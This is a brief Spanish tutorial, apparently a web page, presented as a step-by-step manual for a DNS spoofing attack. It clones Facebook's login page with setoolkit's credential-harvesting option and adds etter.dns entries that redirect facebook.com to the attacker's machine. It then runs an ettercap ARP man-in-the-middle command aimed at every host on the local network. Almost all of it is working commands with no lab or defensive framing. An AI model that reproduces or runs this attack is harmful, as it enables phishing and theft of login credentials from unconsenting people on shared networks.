Ataque DNS Spoofing


Ataque DNS Spoofing

Este es un manual paso a paso de un ataque DNS Spoofing.

Para este tutorial utilizamos Kali Linux el cual incluye las herramientas necesarias para realizar el ataque.

Requisitos para efectuar el ataque

  • Estar dentro de la misma red de la victima.
  • Setoolkit (o template web).
  • Apache2
  • Ettercap

Proceso

  • Ingresar en la red.
  • Clonar la página web.
  • Iniciar servicio web.
  • Configurar DNS.
  • Realizar ataque.

Comencemos

Primero se clona la página. Puede ser manual o con setoolkit

Con setoolkit:

setoolkit -> yes -> y

1 -> Ataque ingenieria social

2 -> Ataque sitio web

3 -> Metodo ataque credenciales

2 -> Clonar un sitio

Luego pide el sitio web a clonar (ej: https://www.facebook.com)

Por ultimo pide iniciar apache -> y

Ahora se debe configurar el archivo ettercap.dns:

nano /etc/ettercap/etter.dns

Agregar:

facebook.com A (IP kali)
*.facebook.com A (IP kali)
www.facebook.com PTR (IP kali)

Se guardan los cambios

Por ultimo se lanza el siguiente comando:

ettercap -T -q -i eth0 -P dns_spoof -M arp // //

Argumentos:

  • -T : Interfaz de sólo texto.
  • -q : Modo silencioso (no muestra el contenido de los paquetes).
  • -i eth0 : Seleccionamos la interfaz de red a utilizar.
  • -P dns_spoof : Activamos el plugin de dns_spoof.
  • -M arp // // : MitM (Man in the Middle) arp // //. Decimos que afecta a todas las máquinas de la red.

Video tutorial